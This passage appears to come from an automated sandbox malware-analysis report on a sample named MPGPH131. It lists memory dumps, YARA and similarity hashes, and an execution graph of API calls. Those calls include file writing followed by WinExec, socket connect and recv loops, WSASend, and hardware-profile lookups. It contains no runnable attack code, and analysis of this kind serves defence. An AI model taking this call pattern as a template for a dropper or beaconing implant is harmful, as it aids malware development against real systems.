                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
                                    • Instruction ID: c0db098467623bca59eca7c8ee1362f6bae71f043de259ca8ba3a90901e0d558
                                    • Opcode Fuzzy Hash: 045a8daa0984c5d62df53d4704e5423a5cb384533651d61441a51bd2b9bdbec5
                                    • Instruction Fuzzy Hash: 8151D3B1C00258DFDF25DFA4DC85BDEBBB5AF05304F148259E449AB382D7786A88CB61
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00303C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1866435925
                                    • Opcode ID: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
                                    • Instruction ID: 30097b6c47e032f552a6757f4ed9b6bbe32c32376421c3ee7c513e6880c1552d
                                    • Opcode Fuzzy Hash: c9d6b1ff241e5fd832478be8655ed88bbb31281d949e4ef5c290a9bce0338137
                                    • Instruction Fuzzy Hash: 1C11D2B2900708ABC711DF58E801B96B7DCAF05310F14C62BF9589B681F774EA54CB95
                                    Strings
                                    • unordered_map/set too long, xrefs: 00372BD3
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: unordered_map/set too long
                                    • API String ID: 0-306623848
                                    • Opcode ID: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
                                    • Instruction ID: 459f5dc0926a4299ce4782244a28dadec5d6aa43b27313f4ef72616c065bfb1b
                                    • Opcode Fuzzy Hash: 1225f2861d56ee1c0f9ddf293a9480c2585ea23aa4553cfe4ff6ddb6643cac3b
                                    • Instruction Fuzzy Hash: ADE1E371A002059FCB29DF28C891A6EB7A5FF49310F15C36AE819EB391E734ED51CB90
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0030844D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: parse error$ror
                                    • API String ID: 2659868963-4201802366
                                    • Opcode ID: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
                                    • Instruction ID: 712217994404f9eea094b8e87e7a578fba5438939b80879ef9de603abb5c1792
                                    • Opcode Fuzzy Hash: 069a050bcc951d00ed4a1761ffc5c10738d8aa00f15df624154de0dfed608241
                                    • Instruction Fuzzy Hash: 9FC11331D10659CFEB0ACF68CC95BADBB71BF45304F148259E044AB6D2DB74AA85CB90
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00308051
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00308060
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: [json.exception.
                                    • API String ID: 4194217158-791563284
                                    • Opcode ID: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
                                    • Instruction ID: 7827a7386969a2c6792d8b85567b88e87984226c76e62627ed2b2d9be5051957
                                    • Opcode Fuzzy Hash: 70474413f1296d8f9fcffc4a5ab505b444ea9b6614a806f8b1e960b359b7d4f2
                                    • Instruction Fuzzy Hash: 17912631D112089FDB1ACFA8CC95BAEFBB5FF45314F148259E400AB6D2DBB4A984C790
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00303C0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                    • API String ID: 2659868963-1240500531
                                    • Opcode ID: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
                                    • Instruction ID: 25b6af1d6b1ef03a353d3a9ca2296ef8d6a49f7e277e92037b8abede0b981f2a
                                    • Opcode Fuzzy Hash: ad6c25f52ef5f5e2c22e3448e1382998228ff2b689e1f9f97f714e59d0a76fe0
                                    • Instruction Fuzzy Hash: F641F672910604ABCB05DF58DC85BAAFBB9EF45310F14822AF9149B6C1E774AA40CB95
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374AB9
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00374AD2
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003755DD
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 003755F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: value
                                    • API String ID: 4194217158-494360628
                                    • Opcode ID: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
                                    • Instruction ID: a1eaed9266ab5c57f2e6cb6dd5f913d821faac2ffaefeed54e1e006097d704a5
                                    • Opcode Fuzzy Hash: 98c7715dbd71f1d2103ad5e92e5fb3c10387da3ca951bb80336ce2adb6d93992
                                    • Instruction Fuzzy Hash: 2D51E3B1C00258DFDF26DFA4CC85BDEBBB4AF05304F148259E449AB382D7786688CB51
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00379681
                                    Strings
                                    • type must be boolean, but is , xrefs: 00379772
                                    • type must be string, but is , xrefs: 003796E8
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID: type must be boolean, but is $type must be string, but is
                                    • API String ID: 118556049-436076039
                                    • Opcode ID: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
                                    • Instruction ID: ad3d3870c9bb876b4eb809998021c8d64e9696f1217ca5a486359f132af683f3
                                    • Opcode Fuzzy Hash: 836650821aed3ca52020c6cd5df08ba0b7bba2b40df1a9e749ffb503f9e66020
                                    • Instruction Fuzzy Hash: 12316EB1D002489FCB16EBA4D842F9E77A9DB14710F10836AF419DB7D6EB38AD04C755

                                    Execution Graph

                                    Execution Coverage:1.9%
                                    Dynamic/Decrypted Code Coverage:1.9%
                                    Signature Coverage:0%
                                    Total number of Nodes:261
                                    Total number of Limit Nodes:26
                                    execution_graph 22946 821000 22948 821044 GetPEB 22946->22948 22950 821077 CreateFileA 22948->22950 22951 821265 22950->22951 22952 82122d 22950->22952 22953 821246 WriteFile 22952->22953 22954 821244 22952->22954 22955 821255 FindCloseChangeNotification WinExec 22953->22955 22954->22955 22955->22951 22957 3567f6 22958 356809 ___std_exception_copy 22957->22958 22963 35654d 22958->22963 22960 35681e 22970 351b9c RtlAllocateHeap ___std_exception_copy 22960->22970 22962 35682b 22965 356559 std::_Locinfo::_Locinfo_ctor 22963->22965 22964 35655f 22980 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 22964->22980 22965->22964 22967 3565a2 22965->22967 22971 3566d0 22967->22971 22969 35657a 22969->22960 22970->22962 22972 3566f6 22971->22972 22973 3566e3 22971->22973 22981 3565f7 22972->22981 22973->22969 22975 3567a7 22975->22969 22977 356719 22977->22975 22985 352c91 22977->22985 22980->22969 22982 356608 22981->22982 22984 356660 22981->22984 22982->22984 22994 35b7fd SetFilePointerEx RtlAllocateHeap ___std_exception_copy 22982->22994 22984->22977 22986 352caa 22985->22986 22990 352cd1 22985->22990 22986->22990 22995 363642 22986->22995 22988 352cc6 23002 362a4b 22988->23002 22991 35b83d 22990->22991 23046 35b71c 22991->23046 22993 35b856 22993->22975 22994->22984 22996 363663 22995->22996 22997 36364e 22995->22997 22996->22988 23009 35a8ff RtlAllocateHeap __dosmaperr 22997->23009 22999 363653 23010 351e60 RtlAllocateHeap ___std_exception_copy 22999->23010 23001 36365e 23001->22988 23003 362a57 std::_Locinfo::_Locinfo_ctor 23002->23003 23004 362a98 23003->23004 23006 362a5f 23003->23006 23007 362ade 23003->23007 23025 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23004->23025 23006->22990 23007->23006 23011 362b5c 23007->23011 23009->22999 23010->23001 23012 362b84 23011->23012 23024 362ba7 23011->23024 23013 362b88 23012->23013 23015 362be3 23012->23015 23031 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23013->23031 23016 362c01 23015->23016 23017 35b83d 2 API calls 23015->23017 23026 3626a1 23016->23026 23017->23016 23020 362c60 23022 362cc9 WriteFile 23020->23022 23020->23024 23021 362c19 23021->23024 23032 362272 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 23021->23032 23022->23024 23024->23006 23025->23006 23033 36e404 23026->23033 23028 3626e1 23028->23020 23028->23021 23029 3626b3 23029->23028 23042 3573d0 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23029->23042 23031->23024 23032->23024 23034 36e411 23033->23034 23036 36e41e 23033->23036 23043 35a8ff RtlAllocateHeap __dosmaperr 23034->23043 23038 36e42a 23036->23038 23044 35a8ff RtlAllocateHeap __dosmaperr 23036->23044 23037 36e416 23037->23029 23038->23029 23040 36e44b 23045 351e60 RtlAllocateHeap ___std_exception_copy 23040->23045 23042->23028 23043->23037 23044->23040 23045->23037 23051 367d9e 23046->23051 23048 35b72e 23049 35b74a SetFilePointerEx 23048->23049 23050 35b736 23048->23050 23049->23050 23050->22993 23052 367dab 23051->23052 23054 367dc0 23051->23054 23064 35a8ec RtlAllocateHeap __dosmaperr 23052->23064 23058 367de5 23054->23058 23066 35a8ec RtlAllocateHeap __dosmaperr 23054->23066 23055 367db0 23065 35a8ff RtlAllocateHeap __dosmaperr 23055->23065 23058->23048 23059 367df0 23067 35a8ff RtlAllocateHeap __dosmaperr 23059->23067 23061 367db8 23061->23048 23062 367df8 23068 351e60 RtlAllocateHeap ___std_exception_copy 23062->23068 23064->23055 23065->23061 23066->23059 23067->23062 23068->23061 23069 28ec20 23070 28f0bf 23069->23070 23077 28ec5e 23069->23077 23071 28eca7 setsockopt recv 23071->23077 23073 28f0aa Sleep 23073->23070 23073->23077 23074 28ecff 23111 2d8330 23074->23111 23077->23070 23077->23071 23077->23073 23077->23074 23079 28f09c Sleep 23077->23079 23087 28db60 WSAStartup 23077->23087 23093 284a90 23077->23093 23096 28e060 23077->23096 23078 28ed38 recv 23080 28ed59 recv 23078->23080 23086 28ed7a 23078->23086 23079->23073 23080->23086 23082 2d8330 2 API calls 23082->23086 23085 28edf1 recv 23085->23086 23086->23079 23086->23082 23086->23085 23116 2d5a60 23086->23116 23133 28e460 6 API calls 23086->23133 23088 28db98 23087->23088 23089 28dc56 23087->23089 23088->23089 23090 28dc24 socket 23088->23090 23089->23077 23090->23089 23091 28dc3a connect 23090->23091 23091->23089 23092 28dc4c closesocket 23091->23092 23092->23089 23092->23090 23134 34c32a 23093->23134 23095 284a9b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 23095->23077 23097 2d5a60 2 API calls 23096->23097 23100 28e0aa 23097->23100 23099 28e204 23101 28e44b 23099->23101 23103 28e22e 23099->23103 23141 2d58e0 23100->23141 23146 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23101->23146 23104 2d8330 2 API calls 23103->23104 23109 28e26e std::_Locinfo::_Locinfo_ctor 23103->23109 23104->23109 23107 28e423 23107->23077 23108 28e3b7 23108->23107 23147 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23108->23147 23109->23108 23110 28e393 WSASend 23109->23110 23110->23108 23110->23109 23112 2d8377 23111->23112 23115 2d8348 std::locale::_Setgloballocale 23111->23115 23149 2db6b0 23112->23149 23114 2d838a 23114->23078 23115->23078 23117 2d5a8a 23116->23117 23118 2d5a9b 23117->23118 23119 2d5b42 23117->23119 23120 2d5aa7 std::_Locinfo::_Locinfo_ctor 23118->23120 23122 2d5acc 23118->23122 23125 2d5b0e 23118->23125 23126 2d5b05 23118->23126 23183 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23119->23183 23120->23086 23127 34c950 std::_Facet_Register 2 API calls 23122->23127 23123 2d5b47 23184 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23123->23184 23129 34c950 std::_Facet_Register 2 API calls 23125->23129 23131 2d5ae6 std::_Locinfo::_Locinfo_ctor 23125->23131 23126->23122 23126->23123 23128 2d5adf 23127->23128 23128->23131 23185 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23128->23185 23129->23131 23131->23086 23133->23086 23137 34c92a 23134->23137 23138 34c338 23137->23138 23139 34c93b GetSystemTimePreciseAsFileTime 23137->23139 23138->23095 23139->23138 23142 2d5911 23141->23142 23143 2d58ee 23141->23143 23142->23099 23143->23142 23148 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23143->23148 23150 2db7fc 23149->23150 23151 2db6d5 23149->23151 23172 272040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23150->23172 23154 2db736 23151->23154 23155 2db743 23151->23155 23157 2db6ea 23151->23157 23153 2db801 23173 271fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 23153->23173 23154->23153 23154->23157 23159 34c950 std::_Facet_Register 2 API calls 23155->23159 23162 2db6fa std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23155->23162 23164 34c950 23157->23164 23159->23162 23163 2db7ba std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 23162->23163 23174 351e70 RtlAllocateHeap ___std_exception_copy __Getctype 23162->23174 23163->23114 23166 34c955 std::_Facet_Register 23164->23166 23167 34c96f 23166->23167 23169 271fa0 Concurrency::cancel_current_task 23166->23169 23176 35b5ec 23166->23176 23167->23162 23168 34c97b 23168->23168 23169->23168 23175 34dd11 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 23169->23175 23171 271fe3 23171->23162 23172->23153 23173->23162 23175->23171 23181 3644ed __dosmaperr std::_Facet_Register 23176->23181 23177 36452b 23182 35a8ff RtlAllocateHeap __dosmaperr 23177->23182 23178 364516 RtlAllocateHeap 23180 364529 23178->23180 23178->23181 23180->23166 23181->23177 23181->23178 23182->23180 23183->23123 23184->23128 23186 4e0072c GetCurrentHwProfileW 23298 2ec6a0 RtlAllocateHeap 23187 4e00773 23188 4e00786 GetCurrentHwProfileW 23187->23188 23189 4e0079b 23188->23189 23190 352a20 23193 35295e 23190->23193 23192 352a32 23196 35296a std::_Locinfo::_Locinfo_ctor 23193->23196 23194 352971 23211 35a8ff RtlAllocateHeap __dosmaperr 23194->23211 23196->23194 23198 352991 23196->23198 23197 352976 23212 351e60 RtlAllocateHeap ___std_exception_copy 23197->23212 23200 352996 23198->23200 23201 3529a3 23198->23201 23213 35a8ff RtlAllocateHeap __dosmaperr 23200->23213 23207 363d48 23201->23207 23204 352981 23204->23192 23205 3529ac 23205->23204 23214 35a8ff RtlAllocateHeap __dosmaperr 23205->23214 23208 363d54 std::_Lockit::_Lockit std::_Locinfo::_Locinfo_ctor 23207->23208 23215 363dec 23208->23215 23210 363d6f 23210->23205 23211->23197 23212->23204 23213->23204 23214->23204 23218 363e0f 23215->23218 23216 363e55 23216->23210 23218->23216 23221 363ab3 23218->23221 23219 363e70 23225 364473 RtlAllocateHeap __dosmaperr 23219->23225 23224 363ac0 __dosmaperr std::_Facet_Register 23221->23224 23222 363aeb RtlAllocateHeap 23223 363afe __dosmaperr 23222->23223 23222->23224 23223->23219 23224->23222 23224->23223 23225->23216 23299 284ab0 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 23226 4e00479 GetCurrentHwProfileW GetCurrentHwProfileW 23227 3562a8 23228 3562bb ___std_exception_copy 23227->23228 23233 356183 23228->23233 23230 3562c7 23240 351b9c RtlAllocateHeap ___std_exception_copy 23230->23240 23232 3562d3 23234 35618f std::_Locinfo::_Locinfo_ctor 23233->23234 23235 356199 23234->23235 23237 3561bc 23234->23237 23255 351de3 RtlAllocateHeap ___std_exception_copy __Getctype 23235->23255 23239 3561b4 23237->23239 23241 35621a 23237->23241 23239->23230 23240->23232 23242 356227 23241->23242 23243 35624a 23241->23243 23267 351de3 